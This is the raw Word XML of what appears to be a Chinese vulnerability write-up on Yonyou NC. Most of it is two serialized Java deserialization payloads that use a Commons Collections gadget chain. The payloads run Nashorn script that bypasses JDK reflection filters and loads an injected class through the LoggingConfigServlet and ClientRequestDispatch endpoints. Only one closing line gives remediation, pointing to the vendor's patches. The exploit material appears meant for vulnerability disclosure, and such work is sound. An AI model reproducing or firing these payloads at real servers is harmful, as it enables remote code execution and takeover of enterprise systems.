        <w:t>orI\x00\x09thresholdxp?@\x00\x00\x00\x00\x00\x00w\x08\x00\x00\x00\x10\x00\x00\x00\x00xxx")}}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/service/~iufo/nc.bs.logging.config.LoggingConfigServlet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16284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\xac\xed\x00\x05sr\x00\x11java.util.HashSet\xbaD\x85\x95\x96\xb8\xb74\x03\x00\x00xpw\x0c\x00\x00\x00\x02?@\x00\x00\x00\x00\x00\x01sr\x004org.apache.commons.collections.keyvalue.TiedMapEntry\x8a\xad\xd2\x9b9\xc1\x1f\xdb\x02\x00\x02L\x00\x03keyt\x00\x12Ljava/lang/Object;L\x00\x03mapt\x00\x0fLjava/util/Map;xpt\x00\x03foosr\x00*org.apache.commons.collections.map.LazyMapn\xe5\x94\x82\x9ey\x10\x94\x03\x00\x01L\x00\x07factoryt\x00,Lorg/apache/commons/collections/Transformer;xpsr\x00:org.apache.commons.collections.functors.ChainedTransformer0\xc7\x97\xec\x28z\x97\x04\x02\x00\x01[\x00\x0diTransformerst\x00-[Lorg/apache/commons/collections/Transformer;xpur\x00-[Lorg.apache.commons.collections.Transformer;\xbdV*\xf1\xd84\x18\x99\x02\x00\x00xp\x00\x00\x00\x04sr\x00;org.apache.commons.collections.functors.ConstantTransformerXv\x90\x11A\x02\xb1\x94\x02\x00\x01L\x00\x09iConstantq\x00~\x00\x03xpvr\x00 javax.script.ScriptEngineManager\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00xpsr\x00:org.apache.commons.collections.functors.InvokerTransformer\x87\xe8\xffk\x7b|\xce8\x02\x00\x03[\x00\x05iArgst\x00\x13[Ljava/lang/Object;L\x00\x0biMethodNamet\x00\x12Ljava/lang/String;[\x00\x0biParamTypest\x00\x12[Ljava/lang/Class;xpur\x00\x13[Ljava.lang.Object;\x90\xceX\x9f\x10s\x29l\x02\x00\x00xp\x00\x00\x00\x00t\x00\x0bnewInstanceur\x00\x12[Ljava.lang.Class;\xab\x16\xd7\xae\xcb\xcdZ\x99\x02\x00\x00xp\x00\x00\x00\x00sq\x00~\x00\x13uq\x00~\x00\x18\x00\x00\x00\x01t\x00\x02jst\x00\x0fgetEngineByNameuq\x00~\x00\x1b\x00\x00\x00\x01vr\x00\x10java.lang.String\xa0\xf0\xa48z;\xb3B\x02\x00\x00xpsq\x00~\x00\x13uq\x00~\x00\x18\x00\x00\x00\x01t45try \x7b\x0a  load\x28\"nashorn:mozilla_compat.js\"\x29;\x0a\x7d catch \x28e\x29 \x7b\x7d\x0afunction getUnsafe\x28\x29\x7b\x0a  var theUnsafeMethod = java.lang.Class.forName\x28\"sun.misc.Unsafe\"\x29.getDeclaredField\x28\"theUnsafe\"\x29;\x0a  theUnsafeMethod.setAccessible\x28true\x29; \x0a  return theUnsafeMethod.get\x28null\x29;\x0a\x7d\x0afunction removeClassCache\x28clazz\x29\x7b\x0a  var unsafe = getUnsafe\x28\x29;\x0a  var clazzAnonymousClass = unsafe.defineAnonymousClass\x28clazz,java.lang.Class.forName\x28\"java.lang.Class\"\x29.getResourceAsStream\x28\"Class.class\"\x29.readAllBytes\x28\x29,null\x29;\x0a  var reflectionDataField = clazzAnonymousClass.getDeclaredField\x28\"reflectionData\"\x29;\x0a  unsafe.putObject\x28clazz,unsafe.objectFieldOffset\x28reflectionDataField\x29,null\x29;\x0a\x7d\x0afunction bypassReflectionFilter\x28\x29 \x7b\x0a  var reflectionClass;\x0a  try \x7b\x0a    reflectionClass = java.lang.Class.forName\x28\"jdk.internal.reflect.Reflection\"\x29;\x0a  \x7d catch \x28error\x29 \x7b\x0a    reflectionClass = java.lang.Class.forName\x28\"sun.reflect.Reflection\"\x29;\x0a  \x7d\x0a  var unsafe = getUnsafe\x28\x29;\x0a  var classBuffer = reflectionClass.getResourceAsStream\x28\"Reflection.class\"\x29.readAllBytes\x28\x29;\x0a  var reflectionAnonymousClass = unsafe.defineAnonymousClass\x28reflectionClass, classBuffer, null\x29;\x0a  var fieldFilterMapField = reflectionAnonymousClass.getDeclaredField\x28\"fieldFilterMap\"\x29;\x0a  var methodFilterMapField = reflectionAnonymousClass.getDeclaredField\x28\"methodFilterMap\"\x29;\x0a  if \x28fieldFilterMapField.getType\x28\x29.isAssignableFrom\x28java.lang.Class.forName\x28\"java.util.HashMap\"\x29\x29\x29 \x7b\x0a    unsafe.putObject\x28reflectionClass, unsafe.staticFieldOffset\x28fieldFilterMapField\x29, java.lang.Class.forName\x28\"java.util.HashMap\"\x29.getConstructor\x28\x29.newInstance\x28\x29\x29;\x0a  \x7d\x0a  if \x28methodFilterMapField.getType\x28\x29.isAssignableFrom\x28java.lang.Class.forName\x28\"java.util.HashMap\"\x29\x29\x29 \x7b\x0a    unsafe.putObject\x28reflectionClass, unsafe.staticFieldOffset\x28methodFilterMapField\x29, java.lang.Class.forName\x28\"java.util.HashMap\"\x29.getConstructor\x28\x29.newInstance\x28\x29\x29;\x0a  \x7d\x0a  removeClassCache\x28java.lang.Class.forName\x28\"java.lang.Class\"\x29\x29;\x0a\x7d\x0afunction setAccessible\x28accessibleObject\x29\x7b\x0a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">    var unsafe = getUnsafe\x28\x29;\x0a    var overrideField = java.lang.Class.forName\x28\"java.lang.reflect.AccessibleObject\"\x29.getDeclaredField\x28\"override\"\x29;\x0a    var offset = unsafe.objectFieldOffset\x28overrideField\x29;\x0a    unsafe.putBoolean\x28accessibleObject, offset, true\x29;\x0a\x7d\x0afunction defineClass\x28bytes\x29\x7b\x0a  var clz = null;\x0a  var version = java.lang.System.getProperty\x28\"java.version\"\x29;\x0a  var unsafe = getUnsafe\x28\x29;\x0a  var classLoader = new java.net.URLClassLoader\x28java.lang.reflect.Array.newInstance\x28java.lang.Class.forName\x28\"java.net.URL\"\x29, 0\x29\x29;\x0a  try\x7b\x0a    if \x28version.split\x28\".\"\x29[0] &gt;= 11\x29 \x7b\x0a      bypassReflectionFilter\x28\x29;\x0a    defineClassMethod = java.lang.Class.forName\x28\"java.lang.ClassLoader\"\x29.getDeclaredMethod\x28\"defineClass\", java.lang.Class.forName\x28\"[B\"\x29,java.lang.Integer.TYPE, java.lang.Integer.TYPE\x29;\x0a    setAccessible\x28defineClassMethod\x29;\x0a    // \xe7\xbb\x95\xe8\xbf\x87 setAccessible \x0a    clz = defineClassMethod.invoke\x28classLoader, bytes, 0, bytes.length\x29;\x0a    \x7delse\x7b\x0a      var protectionDomain = new java.security.ProtectionDomain\x28new java.security.CodeSource\x28null, java.lang.reflect.Array.newInstance\x28java.lang.Class.forName\x28\"java.security.cert.Certificate\"\x29, 0\x29\x29, null, classLoader, []\x29;\x0a      clz = unsafe.defineClass\x28null, bytes, 0, bytes.length, classLoader, protectionDomain\x29;\x0a    \x7d\x0a  \x7dcatch\x28error\x29\x7b\x0a    error.printStackTrace\x28\x29;\x0a  \x7dfinally\x7b\x0a    return clz;\x0a  \x7d\x0a\x7d\x0afunction base64DecodeToByte\x28str\x29 \x7b\x0a  var bt;\x0a  try\x7b\x0a    bt = java.lang.Class.forName\x28\"sun.misc.BASE64Decoder\"\x29.newInstance\x28\x29.decodeBuffer\x28str\x29;\x0a  \x7dcatch\x28e\x29\x7b\x7d\x0a  if \x28bt == null\x29\x7b\x0a    try\x7b\x0a      bt = java.lang.Class.forName\x28\"java.util.Base64\"\x29.newInstance\x28\x29.getDecoder\x28\x29.decode\x28str\x29;\x0a    \x7dcatch\x28e\x29\x7b\x7d\x0a  \x7d\x0a  if\x28bt == null\x29\x7b\x0a    try\x7b\x0a      bt = java.util.Base64.getDecoder\x28\x29.decode\x28str\x29;\x0a    \x7dcatch\x28e\x29\x7b\x7d\x0a  \x7d\x0a  if \x28bt == null\x29\x7b\x0a    bt = java.lang.Class.forName\x28\"org.apache.commons.codec.binary.Base64\"\x29.newInstance\x28\x29.decode\x28str\x29;\x0a  \x7d\x0a  return bt;\x0a\x7d\x0avar code=\"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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>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\";\x0aclz = defineClass\x28base64DecodeToByte\x28code\x29\x29;clz.newInstance\x28\x29;t\x00\x04evaluq\x00~\x00\x1b\x00\x00\x00\x01q\x00~\x00#sr\x00\x11java.util.HashMap\x05\x07\xda\xc1\xc3\x16`\xd1\x03\x00\x02F\x00\x0aloadFact</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>orI\x00\x09thresholdxp?@\x00\x00\x00\x00\x00\x00w\x08\x00\x00\x00\x10\x00\x00\x00\x00xxx")}}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/service/~iufo/nc.ui.iufo.jiuqi.ClientRequestDispatch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16284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unquote("\xac\xed\x00\x05sr\x00\x11java.util.HashSet\xbaD\x85\x95\x96\xb8\xb74\x03\x00\x00xpw\x0c\x00\x00\x00\x02?@\x00\x00\x00\x00\x00\x01sr\x004org.apache.commons.collections.keyvalue.TiedMapEntry\x8a\xad\xd2\x9b9\xc1\x1f\xdb\x02\x00\x02L\x00\x03keyt\x00\x12Ljava/lang/Object;L\x00\x03mapt\x00\x0fLjava/util/Map;xpt\x00\x03foosr\x00*org.apache.commons.collections.map.LazyMapn\xe5\x94\x82\x9ey\x10\x94\x03\x00\x01L\x00\x07factoryt\x00,Lorg/apache/commons/collections/Transformer;xpsr\x00:org.apache.commons.collections.functors.ChainedTransformer0\xc7\x97\xec\x28z\x97\x04\x02\x00\x01[\x00\x0diTransformerst\x00-[Lorg/apache/commons/collections/Transformer;xpur\x00-[Lorg.apache.commons.collections.Transformer;\xbdV*\xf1\xd84\x18\x99\x02\x00\x00xp\x00\x00\x00\x04sr\x00;org.apache.commons.collections.functors.ConstantTransformerXv\x90\x11A\x02\xb1\x94\x02\x00\x01L\x00\x09iConstantq\x00~\x00\x03xpvr\x00 javax.script.ScriptEngineManager\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00xpsr\x00:org.apache.commons.collections.functors.InvokerTransformer\x87\xe8\xffk\x7b|\xce8\x02\x00\x03[\x00\x05iArgst\x00\x13[Ljava/lang/Object;L\x00\x0biMethodNamet\x00\x12Ljava/lang/String;[\x00\x0biParamTypest\x00\x12[Ljava/lang/Class;xpur\x00\x13[Ljava.lang.Object;\x90\xceX\x9f\x10s\x29l\x02\x00\x00xp\x00\x00\x00\x00t\x00\x0bnewInstanceur\x00\x12[Ljava.lang.Class;\xab\x16\xd7\xae\xcb\xcdZ\x99\x02\x00\x00xp\x00\x00\x00\x00sq\x00~\x00\x13uq\x00~\x00\x18\x00\x00\x00\x01t\x00\x02jst\x00\x0fgetEngineByNameuq\x00~\x00\x1b\x00\x00\x00\x01vr\x00\x10java.lang.String\xa0\xf0\xa48z;\xb3B\x02\x00\x00xpsq\x00~\x00\x13uq\x00~\x00\x18\x00\x00\x00\x01t45try \x7b\x0a  load\x28\"nashorn:mozilla_compat.js\"\x29;\x0a\x7d catch \x28e\x29 \x7b\x7d\x0afunction getUnsafe\x28\x29\x7b\x0a  var theUnsafeMethod = java.lang.Class.forName\x28\"sun.misc.Unsafe\"\x29.getDeclaredField\x28\"theUnsafe\"\x29;\x0a  theUnsafeMethod.setAccessible\x28true\x29; \x0a  return theUnsafeMethod.get\x28null\x29;\x0a\x7d\x0afunction removeClassCache\x28clazz\x29\x7b\x0a  var unsafe = getUnsafe\x28\x29;\x0a  var clazzAnonymousClass = unsafe.defineAnonymousClass\x28clazz,java.lang.Class.forName\x28\"java.lang.Class\"\x29.getResourceAsStream\x28\"Class.class\"\x29.readAllBytes\x28\x29,null\x29;\x0a  var reflectionDataField = clazzAnonymousClass.getDeclaredField\x28\"reflectionData\"\x29;\x0a  unsafe.putObject\x28clazz,unsafe.objectFieldOffset\x28reflectionDataField\x29,null\x29;\x0a\x7d\x0afunction bypassReflectionFilter\x28\x29 \x7b\x0a  var reflectionClass;\x0a  try \x7b\x0a    reflectionClass = java.lang.Class.forName\x28\"jdk.internal.reflect.Reflection\"\x29;\x0a  \x7d catch \x28error\x29 \x7b\x0a    reflectionClass = java.lang.Class.forName\x28\"sun.reflect.Reflection\"\x29;\x0a  \x7d\x0a  var unsafe = getUnsafe\x28\x29;\x0a  var classBuffer = reflectionClass.getResourceAsStream\x28\"Reflection.class\"\x29.readAllBytes\x28\x29;\x0a  var reflectionAnonymousClass = unsafe.defineAnonymousClass\x28reflectionClass, classBuffer, null\x29;\x0a  var fieldFilterMapField = reflectionAnonymousClass.getDeclaredField\x28\"fieldFilterMap\"\x29;\x0a  var methodFilterMapField = reflectionAnonymousClass.getDeclaredField\x28\"methodFilterMap\"\x29;\x0a  if \x28fieldFilterMapField.getType\x28\x29.isAssignableFrom\x28java.lang.Class.forName\x28\"java.util.HashMap\"\x29\x29\x29 \x7b\x0a    unsafe.putObject\x28reflectionClass, unsafe.staticFieldOffset\x28fieldFilterMapField\x29, java.lang.Class.forName\x28\"java.util.HashMap\"\x29.getConstructor\x28\x29.newInstance\x28\x29\x29;\x0a  \x7d\x0a  if \x28methodFilterMapField.getType\x28\x29.isAssignableFrom\x28java.lang.Class.forName\x28\"java.util.HashMap\"\x29\x29\x29 \x7b\x0a    unsafe.putObject\x28reflectionClass, unsafe.staticFieldOffset\x28methodFilterMapField\x29, java.lang.Class.forName\x28\"java.util.HashMap\"\x29.getConstructor\x28\x29.newInstance\x28\x29\x29;\x0a  \x7d\x0a  removeClassCache\x28java.lang.Class.forName\x28\"java.lang.Class\"\x29\x29;\x0a\x7d\x0afunction setAccessible\x28accessibleObject\x29\x7b\x0a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">    var unsafe = getUnsafe\x28\x29;\x0a    var overrideField = java.lang.Class.forName\x28\"java.lang.reflect.AccessibleObject\"\x29.getDeclaredField\x28\"override\"\x29;\x0a    var offset = unsafe.objectFieldOffset\x28overrideField\x29;\x0a    unsafe.putBoolean\x28accessibleObject, offset, true\x29;\x0a\x7d\x0afunction defineClass\x28bytes\x29\x7b\x0a  var clz = null;\x0a  var version = java.lang.System.getProperty\x28\"java.version\"\x29;\x0a  var unsafe = getUnsafe\x28\x29;\x0a  var classLoader = new java.net.URLClassLoader\x28java.lang.reflect.Array.newInstance\x28java.lang.Class.forName\x28\"java.net.URL\"\x29, 0\x29\x29;\x0a  try\x7b\x0a    if \x28version.split\x28\".\"\x29[0] &gt;= 11\x29 \x7b\x0a      bypassReflectionFilter\x28\x29;\x0a    defineClassMethod = java.lang.Class.forName\x28\"java.lang.ClassLoader\"\x29.getDeclaredMethod\x28\"defineClass\", java.lang.Class.forName\x28\"[B\"\x29,java.lang.Integer.TYPE, java.lang.Integer.TYPE\x29;\x0a    setAccessible\x28defineClassMethod\x29;\x0a    // \xe7\xbb\x95\xe8\xbf\x87 setAccessible \x0a    clz = defineClassMethod.invoke\x28classLoader, bytes, 0, bytes.length\x29;\x0a    \x7delse\x7b\x0a      var protectionDomain = new java.security.ProtectionDomain\x28new java.security.CodeSource\x28null, java.lang.reflect.Array.newInstance\x28java.lang.Class.forName\x28\"java.security.cert.Certificate\"\x29, 0\x29\x29, null, classLoader, []\x29;\x0a      clz = unsafe.defineClass\x28null, bytes, 0, bytes.length, classLoader, protectionDomain\x29;\x0a    \x7d\x0a  \x7dcatch\x28error\x29\x7b\x0a    error.printStackTrace\x28\x29;\x0a  \x7dfinally\x7b\x0a    return clz;\x0a  \x7d\x0a\x7d\x0afunction base64DecodeToByte\x28str\x29 \x7b\x0a  var bt;\x0a  try\x7b\x0a    bt = java.lang.Class.forName\x28\"sun.misc.BASE64Decoder\"\x29.newInstance\x28\x29.decodeBuffer\x28str\x29;\x0a  \x7dcatch\x28e\x29\x7b\x7d\x0a  if \x28bt == null\x29\x7b\x0a    try\x7b\x0a      bt = java.lang.Class.forName\x28\"java.util.Base64\"\x29.newInstance\x28\x29.getDecoder\x28\x29.decode\x28str\x29;\x0a    \x7dcatch\x28e\x29\x7b\x7d\x0a  \x7d\x0a  if\x28bt == null\x29\x7b\x0a    try\x7b\x0a      bt = java.util.Base64.getDecoder\x28\x29.decode\x28str\x29;\x0a    \x7dcatch\x28e\x29\x7b\x7d\x0a  \x7d\x0a  if \x28bt == null\x29\x7b\x0a    bt = java.lang.Class.forName\x28\"org.apache.commons.codec.binary.Base64\"\x29.newInstance\x28\x29.decode\x28str\x29;\x0a  \x7d\x0a  return bt;\x0a\x7d\x0avar code=\"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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>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\";\x0aclz = defineClass\x28base64DecodeToByte\x28code\x29\x29;clz.newInstance\x28\x29;t\x00\x04evaluq\x00~\x00\x1b\x00\x00\x00\x01q\x00~\x00#sr\x00\x11java.util.HashMap\x05\x07\xda\xc1\xc3\x16`\xd1\x03\x00\x02F\x00\x0aloadFact</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>orI\x00\x09thresholdxp?@\x00\x00\x00\x00\x00\x00w\x08\x00\x00\x00\x10\x00\x00\x00\x00xxx")}}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1、目前厂商针对以上漏洞均已发布漏洞修复程序，请及时更新升级：https://security.yonyou.com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DC664C"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="25DC66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jk2ZGFmYzhiMGZlNDU2YjkyZTI5ZjVlNDdkMWIifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00000000"/>
    <w:rsid w:val="0870623F"/>
    <w:rsid w:val="0C2E7CC3"/>
    <w:rsid w:val="0F613CA1"/>
    <w:rsid w:val="3C215F09"/>
    <w:rsid w:val="3F204B9E"/>
    <w:rsid w:val="4F09644D"/>
    <w:rsid w:val="50EA29CB"/>
    <w:rsid w:val="7A203CB9"/>
    <w:rsid w:val="7B76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2023-12-11T16:53:00Z</dcterms:created>
  <dc:creator>wll</dc:creator>
  <cp:lastModifiedBy>----末悲</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-11T17:20:44Z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028B708AC70C4231B0154D5C6C241B9C_12</vt:lpwstr>
  </property>
</Properties>
</file>